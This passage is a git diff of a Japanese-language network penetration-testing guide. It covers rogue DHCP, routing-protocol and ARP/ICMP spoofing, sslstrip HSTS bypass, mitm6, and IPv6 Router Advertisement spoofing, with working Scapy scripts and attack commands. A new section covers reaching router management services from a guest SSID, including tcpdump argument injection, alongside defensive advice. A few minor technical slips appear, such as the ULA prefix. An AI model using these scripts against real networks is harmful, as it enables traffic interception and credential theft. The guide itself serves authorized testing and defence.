これらのオプションを正しく使用することで、不正なDHCPサーバーを効果的に設定し、ネットワークトラフィックを傍受することができます。 ```python @@ -533,70 +535,72 @@ yersinia dhcp -attack 3 #More parameters are needed - TLS証明書検証をバイパスするためにEAP-MD5認証を強制する - ハブや類似のものを使用して認証時に悪意のあるネットワークトラフィックを注入する -攻撃者が被害者と認証サーバーの間にいる場合、必要に応じて認証プロトコルをEAP-MD5にダウングレードし、認証試行をキャプチャしようとすることができます。その後、次の方法でこれをブルートフォースすることができます: +攻撃者が被害者と認証サーバーの間にいる場合、必要に応じて認証プロトコルをEAP-MD5にダウングレードし、認証試行をキャプチャしようとすることができます。その後、次の方法でブルートフォース攻撃を行うことができます: ``` eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt ``` -### FHRP (GLBP & HSRP) 攻撃 +### FHRP (GLBP & HSRP) Attacks -**FHRP** (First Hop Redundancy Protocol) は、**ホット冗長ルーティングシステムを作成するために設計されたネットワークプロトコルのクラス**です。FHRPを使用すると、物理ルーターを単一の論理デバイスに統合でき、耐障害性が向上し、負荷を分散するのに役立ちます。 +**FHRP** (First Hop Redundancy Protocol) は、**ホット冗長ルーティングシステムを作成するために設計されたネットワークプロトコルのクラス**です。FHRPを使用すると、物理ルーターを単一の論理デバイスに統合でき、耐障害性が向上し、負荷の分散が助けられます。 **Cisco Systemsのエンジニアは、GLBPとHSRPの2つのFHRPプロトコルを開発しました。** + {{#ref}} glbp-and-hsrp-attacks.md {{#endref}} ### RIP -ルーティング情報プロトコル (RIP) の3つのバージョンが存在します: RIP、RIPv2、およびRIPng。RIPとRIPv2は、UDPを使用してポート520経由でピアにデータグラムを送信しますが、RIPngはIPv6マルチキャストを介してUDPポート521にデータグラムをブロードキャストします。MD5認証のサポートはRIPv2によって導入されました。一方、RIPngにはネイティブ認証が組み込まれておらず、代わりにIPv6内のオプションのIPsec AHおよびESPヘッダーに依存しています。 +ルーティング情報プロトコル(RIP)の3つのバージョンが存在します:RIP、RIPv2、およびRIPng。RIPとRIPv2はポート520を介してUDPでピアにデータグラムを送信しますが、RIPngはIPv6マルチキャストを介してUDPポート521にデータグラムをブロードキャストします。MD5認証のサポートはRIPv2によって導入されました。一方、RIPngにはネイティブ認証が組み込まれておらず、代わりにIPv6内のオプションのIPsec AHおよびESPヘッダーに依存しています。 - **RIPとRIPv2:** 通信はポート520のUDPデータグラムを介して行われます。 - **RIPng:** IPv6マルチキャストを介してデータグラムをブロードキャストするためにUDPポート521を利用します。 RIPv2はMD5認証をサポートしていますが、RIPngはネイティブ認証を含まず、IPv6内のIPsec AHおよびESPヘッダーに依存しています。 -### EIGRP 攻撃 +### EIGRP Attacks -**EIGRP (Enhanced Interior Gateway Routing Protocol)** は動的ルーティングプロトコルです。**距離ベクトルプロトコルです。** **認証**がなく、受動インターフェースの設定がない場合、**侵入者**はEIGRPルーティングに干渉し、**ルーティングテーブルの中毒**を引き起こす可能性があります。さらに、EIGRPネットワーク(言い換えれば、自律システム)は**フラットであり、ゾーンに分割されていません**。**攻撃者がルートを注入**すると、そのルートは自律EIGRPシステム全体に**広がる**可能性があります。 +**EIGRP (Enhanced Interior Gateway Routing Protocol)** は動的ルーティングプロトコルです。**距離ベクトルプロトコルです。** **認証**がなく、受動インターフェースの設定がない場合、**侵入者**がEIGRPルーティングに干渉し、**ルーティングテーブルの中毒**を引き起こす可能性があります。さらに、EIGRPネットワーク(言い換えれば、自律システム)は**フラットで、ゾーンに分割されていません**。**攻撃者がルートを注入**すると、そのルートは自律EIGRPシステム全体に**広がる**可能性があります。 EIGRPシステムを攻撃するには、**正当なEIGRPルーターとの隣接関係を確立する**必要があり、これにより基本的な偵察からさまざまな注入まで多くの可能性が開かれます。 -[**FRRouting**](https://frrouting.org/) は、**BGP、OSPF、EIGRP、RIPおよびその他のプロトコルをサポートする仮想ルーターを実装することを可能にします。** これを攻撃者のシステムに展開するだけで、実際にルーティングドメイン内の正当なルーターのふりをすることができます。 +[**FRRouting**](https://frrouting.org/)を使用すると、**BGP、OSPF、EIGRP、RIPおよびその他のプロトコルをサポートする仮想ルーターを実装できます。** これを攻撃者のシステムに展開するだけで、実際にルーティングドメイン内の正当なルーターのふりをすることができます。 + {{#ref}} eigrp-attacks.md {{#endref}} -[**Coly**](https://code.google.com/p/coly/) は、EIGRP (Enhanced Interior Gateway Routing Protocol) ブロードキャストを傍受する機能を持っています。また、ルーティング構成を変更するために利用できるパケットの注入も可能です。 +[**Coly**](https://code.google.com/p/coly/)は、EIGRP(Enhanced Interior Gateway Routing Protocol)ブロードキャストを傍受する機能を持っています。また、パケットの注入を可能にし、ルーティング構成を変更するために利用できます。 ### OSPF -Open Shortest Path First (OSPF) プロトコルでは、**ルーター間の安全な通信を確保するためにMD5認証が一般的に使用されます**。しかし、このセキュリティ対策は、LokiやJohn the Ripperのようなツールを使用して侵害される可能性があります。これらのツールはMD5ハッシュをキャプチャして解読することができ、認証キーを暴露します。このキーが取得されると、新しいルーティング情報を導入するために使用できます。ルートパラメータを設定し、侵害されたキーを確立するために、_Injection_ および _Connection_ タブがそれぞれ利用されます。 +Open Shortest Path First (OSPF) プロトコルでは、**ルーター間の安全な通信を確保するためにMD5認証が一般的に使用されます**。しかし、このセキュリティ対策は、LokiやJohn the Ripperのようなツールを使用して侵害される可能性があります。これらのツールはMD5ハッシュをキャプチャして解読することができ、認証キーを暴露します。このキーが取得されると、新しいルーティング情報を導入するために使用できます。ルートパラメータを設定し、侵害されたキーを確立するために、_Injection_タブと_Connection_タブがそれぞれ利用されます。 - **MD5ハッシュのキャプチャと解読:** LokiやJohn the Ripperのようなツールがこの目的で使用されます。 -- **ルートパラメータの設定:** これは _Injection_ タブを通じて行われます。 -- **侵害されたキーの設定:** キーは _Connection_ タブの下で設定されます。 +- **ルートパラメータの設定:** これは_Injection_タブを介して行われます。 +- **侵害されたキーの設定:** キーは_Connection_タブで設定されます。 -### その他の一般的なツールとリソース +### Other Generic Tools & Sources -- [**Above**](https://github.com/c4s73r/Above): ネットワークトラフィックをスキャンし、脆弱性を見つけるためのツール -- **ネットワーク攻撃に関する** [**詳細情報**](https://github.com/Sab0tag3d/MITM-cheatsheet) を見つけることができます。 +- [**Above**](https://github.com/c4s73r/Above): ネットワークトラフィックをスキャンし、脆弱性を見つけるツール +- **ネットワーク攻撃に関する** [**詳細情報**](https://github.com/Sab0tag3d/MITM-cheatsheet)を見つけることができます。 -## **スプーフィング** +## **Spoofing** -攻撃者は、偽のDHCP応答を送信してネットワークの新しいメンバーのすべてのネットワークパラメータ (GW、IP、DNS) を設定します。 +攻撃者は、偽のDHCP応答を送信してネットワークの新しいメンバーのすべてのネットワークパラメータ(GW、IP、DNS)を設定します。 ```bash Ettercap yersinia dhcp -attack 2 #More parameters are needed ``` ### ARP Spoofing -[前のセクション](#arp-spoofing)を確認してください。 +前のセクションを確認してください [previous section](#arp-spoofing). ### ICMPRedirect -ICMP Redirectは、攻撃者がIPに到達する最良の方法であることを示すICMPパケットタイプ1コード5を送信することから成ります。次に、被害者がそのIPに連絡を取りたい場合、攻撃者を通じてパケットを送信します。 +ICMP Redirectは、攻撃者がIPに到達する最良の方法であることを示すICMPパケットタイプ1コード5を送信することから成ります。次に、被害者がそのIPに連絡を取りたいとき、攻撃者を通じてパケットを送信します。 ```bash Ettercap icmp_redirect @@ -638,25 +642,25 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder DNSルックアップが失敗した場合のローカルホスト解決のために、Microsoftシステムは**Link-Local Multicast Name Resolution (LLMNR)**および**NetBIOS Name Service (NBT-NS)**に依存しています。同様に、**Apple Bonjour**および**Linuxゼロコンフィギュレーション**の実装は、ネットワーク内のシステムを発見するために**Multicast DNS (mDNS)**を利用します。これらのプロトコルは認証されておらず、UDP上でメッセージをブロードキャストするため、攻撃者によって悪意のあるサービスにユーザーをリダイレクトするために悪用される可能性があります。 Responderを使用して、ホストによって検索されるサービスを偽装し、偽の応答を送信することができます。\ -Responderを使用してサービスを偽装する方法についての詳細は、こちらをお読みください。[how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)。 +Responderを使用してサービスを偽装する方法についての詳細は[こちらをお読みください](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)。 ### [WPADのスプーフィング](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ブラウザは一般的に**Web Proxy Auto-Discovery (WPAD)プロトコルを使用して自動的にプロキシ設定を取得します**。これは、特に「http://wpad.example.org/wpad.dat」のようなURLを介してサーバーから構成詳細を取得することを含みます。このサーバーの発見は、クライアントによってさまざまなメカニズムを通じて行われる可能性があります: - **DHCP**を介して、特別なコード252エントリを利用して発見が促進されます。 -- **DNS**によって、ローカルドメイン内で_wpad_というラベルの付いたホスト名を検索します。 +- **DNS**によって、ローカルドメイン内で_wpad_というラベルの付けられたホスト名を検索します。 - **Microsoft LLMNRおよびNBT-NS**を介して、DNSルックアップが成功しない場合に使用されるフォールバックメカニズムです。 -ツールResponderは、このプロトコルを利用して**悪意のあるWPADサーバー**として機能します。DHCP、DNS、LLMNR、およびNBT-NSを使用して、クライアントを誤って接続させるように誘導します。Responderを使用してサービスを偽装する方法についてさらに詳しくは、[check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)。 +ツールResponderは、このプロトコルを利用して**悪意のあるWPADサーバー**として機能します。DHCP、DNS、LLMNR、およびNBT-NSを使用して、クライアントを誤って接続させるように誘導します。Responderを使用してサービスを偽装する方法についてさらに詳しくは[こちらを確認してください](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)。 ### [SSDPおよびUPnPデバイスのスプーフィング](spoofing-ssdp-and-upnp-devices.md) -ネットワーク内で異なるサービスを提供し、**ユーザーを騙してプレーンテキストの認証情報を入力させる**ことができます。**この攻撃に関する詳細は、[**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**をご覧ください。** +ネットワーク内で異なるサービスを提供して、**ユーザーを騙してプレーンテキストの認証情報を入力させる**ことができます。**この攻撃に関する詳細は** [**SSDPおよびUPnPデバイスのスプーフィング**](spoofing-ssdp-and-upnp-devices.md)**でご覧ください。** ### IPv6隣接スプーフィング -この攻撃はARPスプーフィングに非常に似ていますが、IPv6の世界で行われます。被害者は、GWのIPv6が攻撃者のMACを持っていると考えることができます。 +この攻撃はARPスプーフィングに非常に似ていますが、IPv6の世界で行われます。被害者は、GWのIPv6が攻撃者のMACを持っていると考えるようになります。 ```bash sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested sudo fake_advertise6 -r -w 2 eth0 #This option will send the Neighbor Advertisement packet every 2 seconds @@ -684,7 +688,7 @@ mitm6 ### sslStrip -基本的に、この攻撃が行うことは、**ユーザー**が**HTTPS**バージョンに**リダイレクト**される**HTTP**ページに**アクセス**しようとした場合です。**sslStrip**は**クライアントとのHTTP接続**と**サーバーとのHTTPS接続**を**維持**するため、**平文**で接続を**スニッフィング**することができます。 +基本的に、この攻撃は、**ユーザー**が**HTTPS**バージョンに**リダイレクト**される**HTTP**ページに**アクセス**しようとした場合に行われます。**sslStrip**は、**クライアント**との**HTTP接続**と**サーバー**との**HTTPS接続**を**維持**するため、**プレーンテキスト**で接続を**スニッフィング**することができます。 ```bash apt-get install sslstrip sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k @@ -697,18 +701,18 @@ More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/Bla ### sslStrip+ と dns2proxy を使用した HSTS バイパス -**sslStrip+ と dns2proxy** の **違い** は、**sslStrip** に対して、例えば _**www.facebook.com**_ を _**wwww.facebook.com**_ **にリダイレクト** し(**余分な** "**w**" に注意)、**このドメインのアドレスを攻撃者の IP に設定** することです。このようにして、**クライアント** は _**wwww.facebook.com**_ **(攻撃者)に接続** しますが、裏では **sslstrip+** が **www.facebook.com** との **実際の接続** を **維持** します。 +**sslStrip+ と dns2proxy** の **違い** は、**sslStrip** に対して、例えば _**www.facebook.com**_ を _**wwww.facebook.com**_ **にリダイレクト** し(**追加の** "**w**" に注意)、このドメインの **アドレスを攻撃者の IP** に設定することです。この方法で、**クライアント** は _**wwww.facebook.com**_ **(攻撃者)** に **接続** しますが、裏では **sslstrip+** が **www.facebook.com** との **実際の接続** を **維持** します。 -この技術の **目的** は **HSTS を回避する** ことで、_**wwww**.facebook.com_ **は** **ブラウザのキャッシュ** に保存されないため、ブラウザは **HTTP での facebook 認証を実行するように騙されます**。\ -この攻撃を実行するには、犠牲者が最初に [http://www.faceook.com](http://www.faceook.com) にアクセスしなければならないことに注意してください。これは、http ページ内のリンクを変更することで実行できます。 +この技術の **目的** は **HSTS を回避する** ことで、_**wwww**.facebook.com_ **は** ブラウザの **キャッシュ** に保存されないため、ブラウザは **HTTP での facebook 認証を実行するように騙されます**。\ +この攻撃を実行するには、犠牲者が最初に [http://www.faceook.com](http://www.faceook.com) にアクセスしなければならないことに注意してください。これは、http ページ内のリンクを修正することで実行できます。 More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). -**sslStrip または sslStrip+ はもう機能しません。これは、ブラウザに事前保存された HSTS ルールがあるためで、ユーザーが「重要な」ドメインに初めてアクセスする場合でも、HTTPS 経由でアクセスします。また、事前保存されたルールや他の生成されたルールは、** [**`includeSubdomains`**](https://hstspreload.appspot.com) **フラグを使用する可能性があるため、以前の** _**wwww.facebook.com**_ **の例は、** _**facebook.com**_ **が `includeSubdomains` で HSTS を使用しているため、もはや機能しません。** +**sslStrip または sslStrip+ はもう機能しません。これは、ブラウザに事前保存された HSTS ルールがあるためで、ユーザーが「重要な」ドメインに初めてアクセスする場合でも、HTTPS 経由でアクセスします。また、事前保存されたルールや他の生成されたルールは、** [**`includeSubdomains`**](https://hstspreload.appspot.com) **フラグを使用する可能性があるため、以前の _**wwww.facebook.com**_ の例は、_**facebook.com**_ が `includeSubdomains` で HSTS を使用しているため、もはや機能しません。** TODO: easy-creds, evilgrade, metasploit, factory -## TCP ポートでリッスン +## ポートでの TCP リッスン ```bash sudo nc -l -p 80 socat TCP4-LISTEN:80,fork,reuseaddr - @@ -736,7 +740,7 @@ sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FI 時には、クライアントがCAが有効であることを確認すると、**CAによって署名された他のホスト名の証明書を提供する**ことができます。\ もう一つの興味深いテストは、**要求されたホスト名の証明書を自己署名で提供する**ことです。 -他にテストすることは、有効なCAではない有効な証明書で証明書に署名しようとすることです。また、有効な公開鍵を使用し、Diffie-Hellmanのようなアルゴリズムを強制的に使用し(実際の秘密鍵で何も復号化する必要がないもの)、クライアントが実際の秘密鍵のプローブ(ハッシュのような)を要求したときに、偽のプローブを送信し、クライアントがこれを確認しないことを期待します。 +他にテストすることは、有効なCAではない有効な証明書で証明書に署名しようとすることです。また、有効な公開鍵を使用し、Diffie-Hellmanのようなアルゴリズムを強制的に使用し(実際の秘密鍵で何も復号化する必要がないもの)、クライアントが実際の秘密鍵のプローブ(ハッシュのような)を要求したときに、偽のプローブを送信し、クライアントがこれをチェックしないことを期待します。 ## Bettercap ```bash @@ -774,7 +778,7 @@ ARPパケットは、ネットワーク内で使用されているIPを発見す ### **mDNS(マルチキャストDNS)** -Bettercapは、**\_services\_.dns-sd.\_udp.local**を要求するMDNSリクエストを送信します(Xミリ秒ごと)。このパケットを見るマシンは通常、このリクエストに応答します。その後、「services」に応答するマシンを検索します。 +Bettercapは、**\_services\_.dns-sd.\_udp.local**を要求するMDNSリクエストを(X msごとに)送信します。このパケットを受信したマシンは通常、このリクエストに応答します。その後、「services」に応答するマシンを検索します。 **ツール** diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 416964b43..ab442e101 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -6,7 +6,7 @@ ### ネットワーク -IPv6 アドレスは、ネットワークの組織化とデバイスの相互作用を強化するように構成されています。IPv6 アドレスは次のように分かれています: +IPv6 アドレスは、ネットワークの組織化とデバイスの相互作用を強化するように構造化されています。IPv6 アドレスは次のように分かれています: 1. **ネットワークプレフィックス**:最初の 48 ビットで、ネットワークセグメントを決定します。 2. **サブネット ID**:次の 16 ビットで、ネットワーク内の特定のサブネットを定義するために使用されます。 @@ -20,7 +20,7 @@ IPv6 は IPv4 に見られる ARP プロトコルを省略していますが、2 IPv6 には特別なアドレスタイプも含まれています: - **ループバックアドレス (`::1`)**:IPv4 の `127.0.0.1` に相当し、ホスト内の内部通信に使用されます。 -- **リンクローカルアドレス (`FE80::/10`)**:ローカルネットワーク活動用で、インターネットルーティングには使用されません。同じローカルネットワーク上のデバイスは、この範囲を使用して互いに発見できます。 +- **リンクローカルアドレス (`FE80::/10`)**:ローカルネットワーク活動のためのもので、インターネットルーティングには使用されません。同じローカルネットワーク上のデバイスは、この範囲を使用して互いに発見できます。 ### ネットワークコマンドにおける IPv6 の実用的な使用法 @@ -45,21 +45,21 @@ IPv6アドレスは、ローカル通信のためにデバイスのMACアドレ MACアドレス **`12:34:56:78:9a:bc`** が与えられた場合、リンクローカルIPv6アドレスは次のように構築できます。 1. MACをIPv6形式に変換: **`1234:5678:9abc`** -2. `fe80::` を前に付け、中間に `fffe` を挿入: **`fe80::1234:56ff:fe78:9abc`** -3. 左から7ビットを反転させ、`1234` を `1034` に変更: **`fe80::1034:56ff:fe78:9abc`** +2. `fe80::`を前に付け、中間に`fffe`を挿入: **`fe80::1234:56ff:fe78:9abc`** +3. 左から7ビットを反転させ、`1234`を`1034`に変更: **`fe80::1034:56ff:fe78:9abc`** ### **IPv6アドレスの種類** - **ユニークローカルアドレス (ULA)**: ローカル通信用で、公共インターネットのルーティングには使用されません。プレフィックス: **`FEC00::/7`** - **マルチキャストアドレス**: 1対多の通信用。マルチキャストグループ内のすべてのインターフェースに配信されます。プレフィックス: **`FF00::/8`** -- **エニキャストアドレス**: 1対最近接の通信用。ルーティングプロトコルに従って最も近いインターフェースに送信されます。**`2000::/3`** のグローバルユニキャスト範囲の一部です。 +- **エニキャストアドレス**: 1対最寄りの通信用。ルーティングプロトコルに従って最も近いインターフェースに送信されます。**`2000::/3`**のグローバルユニキャスト範囲の一部です。 ### **アドレスプレフィックス** -- **fe80::/10**: リンクローカルアドレス(169.254.x.xに類似) -- **fc00::/7**: ユニークローカルユニキャスト(プライベートIPv4範囲の10.x.x.x、172.16.x.x、192.168.x.xに類似) +- **fe80::/10**: リンクローカルアドレス(169.254.x.xに似ています) +- **fc00::/7**: ユニークローカルユニキャスト(プライベートIPv4範囲の10.x.x.x、172.16.x.x、192.168.x.xに似ています) - **2000::/3**: グローバルユニキャスト -- **ff02::1**: マルチキャスト全ノード +- **ff02::1**: マルチキャストすべてのノード - **ff02::2**: マルチキャストルーターノード ### **ネットワーク内のIPv6アドレスを発見する方法** @@ -77,20 +77,20 @@ service ufw stop # Stop the firewall ping6 -I ff02::1 # Send a ping to multicast address ip -6 neigh # Display the neighbor table ``` -### IPv6 Man-in-the-Middle (MitM) Attacks +### IPv6 Man-in-the-Middle (MitM) 攻撃 -IPv6ネットワークでMitM攻撃を実行するためのいくつかの技術が存在します。例えば: +IPv6 ネットワークで MitM 攻撃を実行するためのいくつかの技術が存在します。例えば: -- ICMPv6隣接またはルーター広告のスプーフィング。 -- ICMPv6リダイレクトまたは「パケットが大きすぎる」メッセージを使用してルーティングを操作する。 -- モバイルIPv6を攻撃する(通常、IPSecを無効にする必要があります)。 -- 悪意のあるDHCPv6サーバーを設定する。 +- ICMPv6 隣接またはルーター広告のスプーフィング。 +- ICMPv6 リダイレクトまたは「パケットが大きすぎます」メッセージを使用してルーティングを操作する。 +- モバイル IPv6 を攻撃する(通常、IPSec を無効にする必要があります)。 +- 悪意のある DHCPv6 サーバーを設定する。 -## Identifying IPv6 Addresses in the eild +## eild における IPv6 アドレスの特定 -### Exploring Subdomains +### サブドメインの探索 -IPv6アドレスに関連する可能性のあるサブドメインを見つける方法は、検索エンジンを活用することです。例えば、`ipv6.*`のようなクエリパターンを使用することが効果的です。具体的には、次の検索コマンドをGoogleで使用できます: +IPv6 アドレスに関連する可能性のあるサブドメインを見つける方法は、検索エンジンを活用することです。例えば、`ipv6.*` のようなクエリパターンを使用することが効果的です。具体的には、次の検索コマンドを Google で使用できます: ```bash site:ipv6./ ``` @@ -98,7 +98,7 @@ site:ipv6./ IPv6アドレスを特定するために、特定のDNSレコードタイプをクエリできます: -- **AXFR**: 完全なゾーン転送を要求し、広範囲のDNSレコードを明らかにする可能性があります。 +- **AXFR**: 完全なゾーン転送をリクエストし、広範囲のDNSレコードを明らかにする可能性があります。 - **AAAA**: IPv6アドレスを直接探します。 - **ANY**: 利用可能なすべてのDNSレコードを返す広範なクエリです。 @@ -126,9 +126,9 @@ sudo sysctl -w fs.file-max=100000 sudo sysctl -w net.core.somaxconn=65535 sudo sysctl -w net.ipv4.tcp_tw_reuse=1 ``` -### Passive NDP & DHCPv6 Sniffing +### パッシブNDPおよびDHCPv6スニッフィング -すべてのIPv6ホストは**自動的に複数のマルチキャストグループ**(`ff02::1`, `ff02::2`, …)に参加し、SLAAC/NDPのためにICMPv6を使用するため、パケットを1つも送信せずに全体のセグメントをマッピングできます。次のPython/Scapyのワンライナーは、最も興味深いL2メッセージをリッスンし、誰が誰であるかの色付きのタイムスタンプ付きログを出力します: +すべてのIPv6ホストは**自動的に複数のマルチキャストグループ**(`ff02::1`、`ff02::2`、…)に参加し、SLAAC/NDPのためにICMPv6を使用するため、パケットを1つも送信せずに全体のセグメントをマッピングできます。次のPython/Scapyのワンライナーは、最も興味深いL2メッセージをリッスンし、誰が誰であるかの色付きのタイムスタンプ付きログを出力します: ```python #!/usr/bin/env python3 from scapy.all import * @@ -195,11 +195,11 @@ argp.add_argument('-t','--time',type=int,default=0,help='Duration (0 = infinite) a = argp.parse_args() sniff(iface=a.interface,prn=handler,timeout=a.time or None,store=0) ``` -結果: 数秒以内に完全な**リンクローカルトポロジー** (MAC ⇄ IPv6) を構築し、アクティブスキャンに依存するIPS/IDSシステムをトリガーすることなく行います。 +結果: 数秒以内に完全な **link-local topology** (MAC ⇄ IPv6) を構築し、アクティブスキャンに依存するIPS/IDSシステムをトリガーすることなく行います。 ### ルーター広告 (RA) スプーフィング -IPv6ホストはデフォルトゲートウェイの発見のために**ICMPv6ルーター広告**に依存しています。正当なルーターよりも**頻繁に**偽のRAを注入すると、デバイスは静かにあなたをゲートウェイとして切り替えます。 +IPv6ホストはデフォルトゲートウェイの発見のために **ICMPv6 Router Advertisements** に依存しています。 正当なルーターよりも **頻繁に** 偽のRAを注入すると、デバイスは静かにあなたをゲートウェイとして切り替えます。 ```python #!/usr/bin/env python3 from scapy.all import * @@ -231,12 +231,12 @@ sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE | フラグ | 意味 | クライアントの動作への影響 | |------|---------|----------------------------| -| **M (管理アドレス構成)** | `1` に設定されている場合、ホストは **DHCPv6** を使用して IPv6 アドレスを取得しなければなりません。 | アドレス全体が DHCPv6 から来るため、*mitm6* スタイルのポイズニングに最適です。 | -| **O (その他の構成)** | `1` に設定されている場合、ホストは **DHCPv6** を使用して *その他* の情報 (DNS, NTP, …) を取得するべきです。 | アドレスは SLAAC 経由ですが、DNS は DHCPv6 でハイジャック可能です。 | +| **M (管理アドレス構成)** | `1` に設定されている場合、ホストは **DHCPv6** を使用して IPv6 アドレスを取得しなければなりません。 | アドレス全体が DHCPv6 から取得されるため、*mitm6* スタイルのポイズニングに最適です。 | +| **O (その他の構成)** | `1` に設定されている場合、ホストは **DHCPv6** を使用して *その他* の情報 (DNS, NTP, …) を取得する必要があります。 | アドレスは SLAAC 経由ですが、DNS は DHCPv6 でハイジャック可能です。 | | **M=0 / O=0** | 純粋な SLAAC ネットワーク。 | RA / RDNSS トリックのみが可能で、クライアントから DHCPv6 は送信されません。 | | **M=1 / O=1** | 混合環境。 | DHCPv6 と SLAAC の両方が使用され、スプーフィングの表面が最も大きくなります。 | -ペンテスト中に、正当な RA を一度検査し、どのベクターが実行可能かを判断できます: +ペンテスト中に、正当な RA を一度確認し、どのベクターが実行可能かを判断できます: ```bash sudo tcpdump -vvv -i eth0 'icmp6 && ip6[40] == 134' # capture Router Advertisements ``` @@ -250,7 +250,7 @@ RA ヘッダー内の **Prf** (ルーターの優先度) フィールドは、* | 中 (デフォルト) | `01` | ほぼすべての正当なデバイスによって使用されます | | 低 | `00` | より良いルーターが存在しない場合にのみ選択されます | -Scapy でパケットを生成する際は、上記のように `prf` パラメータを通じて設定できます (`prf=0x1` → 高)。 **高い Prf**、**短い間隔**、および **ゼロ以外のライフタイム** を組み合わせることで、あなたの不正ゲートウェイは非常に安定します。 +Scapy でパケットを生成する際には、上記のように `prf` パラメータを通じて設定できます (`prf=0x1` → 高)。 **高い Prf**、**短い間隔**、および **ゼロ以外のライフタイム** を組み合わせることで、あなたの不正ゲートウェイは非常に安定します。 --- @@ -263,11 +263,12 @@ from scapy.all import * import argparse p = argparse.ArgumentParser() -p.add_argument('-i','--interface',required=True) -p.add_argument('--llip',required=True) -p.add_argument('--dns',required=True,help='Fake DNS IPv6') -p.add_argument('--lifetime',type=int,default=600) -p.add_argument('--interval',type=int,default=5) +P = p.add_argument +P('-i','--interface',required=True) +P('--llip',required=True) +P('--dns',required=True,help='Fake DNS IPv6') +P('--lifetime',type=int,default=600) +P('--interval',type=int,default=5) args = p.parse_args() ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/ @@ -280,7 +281,7 @@ send(ra,iface=args.interface,loop=1,inter=args.interval) ### DHCPv6 DNS スプーフィング (mitm6) -SLAACの代わりに、WindowsネットワークはしばしばDNSのために**ステートレスDHCPv6**に依存します。[mitm6](https://github.com/rofl0r/mitm6)は、`Solicit`メッセージに自動的に**Advertise → Reply**フローで応答し、**あなたのリンクローカルアドレスを300秒間DNSとして割り当てます**。これにより以下が可能になります: +SLAACの代わりに、WindowsネットワークはDNSのために**ステートレスDHCPv6**に依存することがよくあります。[mitm6](https://github.com/rofl0r/mitm6)は、`Solicit`メッセージに自動的に**Advertise → Reply**フローで応答し、**あなたのリンクローカルアドレスを300秒間DNSとして割り当てます**。これにより以下が可能になります: * NTLMリレー攻撃 (WPAD + DNSハイジャック) * ルーターに触れずに内部名前解決を傍受する @@ -296,6 +297,51 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning * **不安定な高レートのRA** や突然の **RDNSSの変更** を監視。 * エンドポイントでのIPv6の無効化は一時的な回避策であり、現代のサービスを破壊し、盲点を隠すことが多いため、代わりにL2フィルタリングを推奨。 +### ゲスト/パブリックSSIDでのNDPルーター発見と管理サービスの露出 + +多くの消費者ルーターは、すべてのインターフェースで管理デーモン(HTTP(S)、SSH/Telnet、TR-069など)を公開しています。一部の展開では、「ゲスト/パブリック」SSIDがWAN/コアにブリッジされ、IPv6専用です。ルーターのIPv6が毎回のブートで変更されても、NDP/ICMPv6を使用して確実に学習し、ゲストSSIDから管理プレーンに直接接続できます。 + +ゲスト/パブリックSSIDに接続されたクライアントからの典型的なワークフロー: + +1) ICMPv6ルーターソリシテーションを使用して、すべてのルーターのマルチキャスト `ff02::2` にルーターを発見し、ルーターアドバタイズメント(RA)をキャプチャ: +```bash +# Listen for Router Advertisements (ICMPv6 type 134) +sudo tcpdump -vvv -i 'icmp6 and ip6[40]==134' + +# Provoke an RA by sending a Router Solicitation to ff02::2 +python3 - <<'PY' +from scapy.all import * +send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='') +PY +``` +RAはルーターのリンクローカルおよびしばしばグローバルアドレス/プレフィックスを明らかにします。リンクローカルのみが知られている場合、接続はゾーンインデックスを指定する必要があることを忘れないでください。例:`ssh -6 admin@[fe80::1%wlan0]`。 + +代替:利用可能な場合はndisc6スイートを使用します: +```bash +# rdisc6 sends RS and prints RAs in a friendly way +rdisc6 +``` +2) ゲストSSIDからIPv6経由で公開されているサービスにアクセスする: +```bash +# SSH/Telnet example (replace with discovered address) +ssh -6 admin@[2001:db8:abcd::1] +# Web UI over IPv6 +curl -g -6 -k 'http://[2001:db8:abcd::1]/' +# Fast IPv6 service sweep +nmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1] +``` +3) 管理シェルがラッパー(例:tcpdump)を介してパケットキャプチャツールを提供する場合、追加のtcpdumpフラグ(`-G/-W/-z`など)を渡すことを可能にする引数/ファイル名のインジェクションを確認し、ポストローテートコマンドの実行を達成します。参照してください: + +{{#ref}} +../../linux-hardening/privilege-escalation/wildcards-spare-tricks.md +{{#endref}} + +防御/メモ: + +- 管理をゲスト/パブリックブリッジにバインドしないでください;SSIDブリッジにIPv6ファイアウォールを適用します。 +- 可能な場合、ゲストセグメントでNDP/RS/RAのレート制限とフィルタリングを行います。 +- 到達可能でなければならないサービスについては、authN/MFAと強力なレート制限を強制します。 + ## 参考文献 - [Legless – IPv6 Penetration Testing](https://blog.exploit.org/caster-legless/) @@ -304,5 +350,6 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning - [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html) - 